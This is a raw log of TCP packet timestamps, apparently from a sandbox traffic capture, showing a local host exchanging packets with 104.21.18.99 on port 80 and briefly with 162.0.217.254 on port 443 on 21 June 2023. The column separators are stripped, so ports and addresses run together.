                                                                                                  Jun 21, 2023 20:23:43.196432114 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196448088 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.196557999 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.196882963 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196913958 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196938992 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196966887 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196980953 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.196995020 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.197022915 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.197051048 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.197061062 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.197081089 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.197084904 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.197108984 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.197135925 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.197150946 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.197165012 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.197191000 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.197208881 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.197217941 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.197247028 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.197268963 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.197276115 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.197302103 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.197328091 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.197352886 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.197365046 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.197460890 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.197901011 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.197932959 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.197958946 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.197983980 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198009014 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198035955 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198051929 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.198061943 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198091030 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198117018 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198131084 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.198143005 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198169947 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198178053 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.198195934 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198204041 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.198223114 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198247910 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198271990 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198297024 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198311090 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.198323965 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198350906 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198371887 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.198479891 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.198807001 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198832035 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198860884 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198884964 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198900938 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.198911905 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198936939 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198945999 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.198964119 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198990107 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.198997974 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.199013948 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199042082 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199045897 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.199069977 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199095011 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199115038 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.199122906 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199150085 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199162006 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.199177027 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199203014 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199213982 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.199229956 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199255943 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199260950 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.199445963 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.199445963 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.199743032 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199774981 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199800014 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199825048 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199850082 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199861050 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.199876070 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199902058 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199908972 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.199928999 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199954033 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199960947 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.199980974 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.199986935 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.202796936 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.249875069 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.762831926 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.183473110 CEST49698443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:44.183553934 CEST44349698162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.183643103 CEST49698443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:44.223503113 CEST49698443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:44.223583937 CEST44349698162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.542372942 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.542454004 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.559592962 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.559669018 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.626055956 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.626111984 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.626187086 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.740006924 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.740006924 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.757066011 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.757134914 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.821584940 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.821643114 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.821747065 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.821805000 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.821831942 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.821878910 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.821892023 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.821928024 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.821974993 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.822021008 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.822027922 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.822091103 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.822135925 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.822159052 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.822192907 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.822194099 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.822271109 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.822331905 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.822334051 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.822477102 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.822532892 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.822580099 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.822608948 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.822633982 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.822652102 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.864963055 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.865058899 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.865083933 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.865107059 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.865175009 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.865204096 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.865273952 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.865324974 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.865361929 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.865437031 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.865504026 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.865530014 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.865576029 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.865641117 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.865658998 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.865734100 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.865794897 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.865806103 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.865926027 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.866050959 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.866089106 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.866127014 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.866172075 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.866180897 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.866255999 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.866314888 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.866316080 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.866355896 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.866405010 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.866441011 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.866532087 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.866617918 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.866631031 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.866664886 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.866715908 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.866748095 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.866831064 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.866957903 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.866964102 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.867041111 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.867100954 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.867146969 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.867192984 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.867240906 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.867268085 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.867325068 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.867383957 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.867400885 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.867480040 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.867552996 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.909905910 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.909965992 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910077095 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910118103 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.910136938 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910182953 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910224915 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.910227060 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910281897 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910321951 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.910332918 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910377979 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910410881 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910450935 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.910455942 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910504103 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910548925 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910593987 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910597086 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.910640955 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910687923 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910732031 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.910732985 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910780907 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910825968 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910862923 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910872936 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.910908937 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910944939 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.910989046 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.910990000 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911037922 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911082029 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911125898 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.911128044 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911169052 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911215067 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911257982 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.911262035 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911308050 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911353111 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911389112 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.911397934 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911444902 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911489964 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911533117 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.911534071 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911580086 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911626101 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911670923 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911674023 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.911710978 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911756039 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911798954 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.911801100 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911849022 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911892891 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911936998 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.911937952 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.911986113 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912030935 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912075996 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912077904 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.912121058 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912166119 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912209988 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.912211895 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912250996 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912318945 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912367105 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912368059 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.912414074 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912457943 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912498951 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.912503004 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912549973 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912595987 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912636042 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.912641048 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912686110 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912733078 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912780046 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912781954 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.912826061 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912864923 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912908077 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.912910938 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.912957907 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.913003922 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.913048029 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.913050890 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.913089037 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.913239956 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.938050985 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.955585957 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.955667019 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.955833912 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.955879927 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.955945015 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.956032991 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.956033945 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.956109047 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.956193924 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.956244946 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.956305981 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.956362009 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.956406116 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.956456900 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.956463099 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.956511974 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.956571102 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.956593990 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.956645012 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.956698895 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.956748009 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.956828117 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.956888914 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.956950903 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.956998110 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.957048893 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:44.957051992 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:44.957106113 CEST4969780192.168.2.4104.21.18.99
